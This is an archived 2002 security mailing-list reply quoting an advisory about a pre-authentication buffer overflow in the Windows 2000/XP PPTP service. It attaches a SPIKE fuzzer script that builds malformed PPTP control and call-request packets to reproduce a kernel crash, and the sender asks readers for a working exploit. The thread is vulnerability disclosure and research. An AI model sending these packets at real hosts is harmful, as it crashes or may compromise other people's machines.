Re: Microsoft PPTP Server and Client remote vulnerability

[dave () immunitysec com (Dave Aitel)]

--=-Z8MqZG1lgavBJqQPhhF6
Content-Type: multipart/mixed; boundary="=-ATvJ0x+eIz+8WY9PMqyn"


--=-ATvJ0x+eIz+8WY9PMqyn
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

SPIKE 2.6.2 or above should be able to handle this .spk file which will
replicate the vulnerability. Someone send me a working sploit in
exchange, please. I'm too lazy to muck with it. (Or I have other
exploits to muck with, one or the other :>)


-dave
P.S. Grab new SPIKE releases (2.6.2 for SPIKE and 1.3 for SPIKE Proxy)
at http://www.immunitysec.com/spike.html, if you haven't already.=20
P.P.S. This script is released under the terms of the GNU GPL v 2.0.


On Thu, 2002-09-26 at 05:43, sh () phion com wrote:
> phion Security Advisory 26/09/2002
> =20
> Microsoft PPTP Server and Client remote vulnerability
> =20
> =20
> Summary
> -----------------------------
> =20
>    The Microsoft PPTP Service shipping with Windows 2000 and XP contains =
a
>    remotely exploitable pre-authentication bufferoverflow.
> =20
> =20
> Affected Systems
> -----------------------------
> =20
>    Microsoft Windows 2000 and XP running either a PPTP Server or Client.
> =20
> =20
> Impact
> -----------------------------
> =20
>    With a specially crafted PPTP packet it is possible to overwrite kerne=
l
>    memory.
> =20
>    A DoS resulting in a lockup of the machine has been verified on
>    Windows 2000 SP3 and Windows XP.
> =20
>    A remote compromise should be possible deploying proper shellcode,
>    as we were able to fill EDI and EDX with our data.
> =20
>    Clients are vulnerable too, because the Service always listens on port
>    1723 on any interface of the machine, this might be of special concern
>    to DSL users which use PPTP to connect to their modem.
> =20
> =20
> Solution
> -----------------------------
> =20
>    As a temporary solution for the Client issue, one might firewall the P=
PTP
>    port in the Internet Connection Firewall for Windows XP.
> =20
>    We dont know of any solution for Windows 2000 and Windows XP PPTP serv=
ers.
> =20
>    The vendor has been informed.
> =20
> =20
> Acknowledgements
> -----------------------------
> =20
>    The bug has been discovered by Stephan Hoffmann and Thomas Unterleitne=
r
>    on behalf of phion Information Technologies.
> =20
> =20
> Contact Information
> -----------------------------
> =20
>    phion Information Technologies can be reached via:
>       office () phion com / http://www.phion.com
> =20
>    Stephan Hoffmann can be reached via:
>       sh () phion com
> =20
>    Thomas Unterleitner can be reached via:
>       t.unterleitner () phion com
> =20
> References
> -----------------------------
> =20
>    [1] phion Information Technologies
>        http://www.phion.com/
> =20
> Exploit
> -----------------------------
> =20
>    phion Information Technologies will not provide an exploit for this is=
sue.
> =20
> =20
> Disclaimer
> -----------------------------
> =20
>    This advisory does not claim to be complete or to be usable for any
>    purpose.
> =20
>    This advisory is free for open distribution in unmodified form.
> =20
>    Articles or Publications that are based on information from this advis=
ory
>    have to include link [1].
> =20
> =20


--=-ATvJ0x+eIz+8WY9PMqyn
Content-Disposition: attachment; filename=pptp.spk
Content-Type: text/plain; name=pptp.spk; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable

//start control request
s_block_start("PPTP");
s_binary_block_size_halfword_bigendian("PPTP");
//message type 1 -  control request
s_int_variable(0x0001,5);
//cookie
s_binary("1a 2b  3c 4d");
//type 1 -  start control request
//5 is big endian halfword
s_int_variable(0x0001,5);
//reserved
s_binary("0000");
//version 1.0
s_int_variable(0x0100,5);
//reserved
s_binary("0000");
//Framing: Ethernet
s_binary("00000003");
//Bearer: Digital
s_binary("00000002");
//maximum channels
s_binary("ffff");
//firmware revision
s_int_variable(0x0001,5);

//hostname
s_string_variable("A");
s_binary_repeat("00",63);

//vendor
s_string_variable("A");
s_binary_repeat("00",63);

s_block_end("PPTP");


///
/// NEXT PACKET
///
///

//start outgoing call request
s_block_start("PPTP2");
s_binary_block_size_halfword_bigendian("PPTP2");
//message type 1 -  control request
s_int_variable(0x0001,5);

//cookie
s_binary("1a 2b  3c 4d");
//type 1 -  outgoing call request
//5 is big endian halfword
s_int_variable(0x0007,5);
//reserved
s_binary("0000");

//call id
s_binary("0000");

//serial number
s_binary("0000");

//min bps
s_binary("00000960");
//max bps
s_binary("00989680");
//bearer capabilities
s_binary("00000002");
//framing
s_binary("00000003");
//recieve window size
s_binary("0003");
//processing delay
s_binary("0000");

s_binary_block_size_halfword_bigendian("PHONENUMBER");
//reserved
s_binary("0000");
s_block_start("PHONENUMBER");
s_string_variable("");
s_block_end("PHONENUMBER");
//subaddress
s_string_variable("");
s_block_end("PPTP2");





--=-ATvJ0x+eIz+8WY9PMqyn--

--=-Z8MqZG1lgavBJqQPhhF6
Content-Type: application/pgp-signature; name=signature.asc
Content-Description: This is a digitally signed message part

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQA9k2phB8JNm+PA+iURAqm7AJsE25Xs+qBtfAmxnXsdtIGt1oxm6gCg04iX
alcRcjRAYoVrPGnYrPxPDxk=
=3TKd
-----END PGP SIGNATURE-----

--=-Z8MqZG1lgavBJqQPhhF6--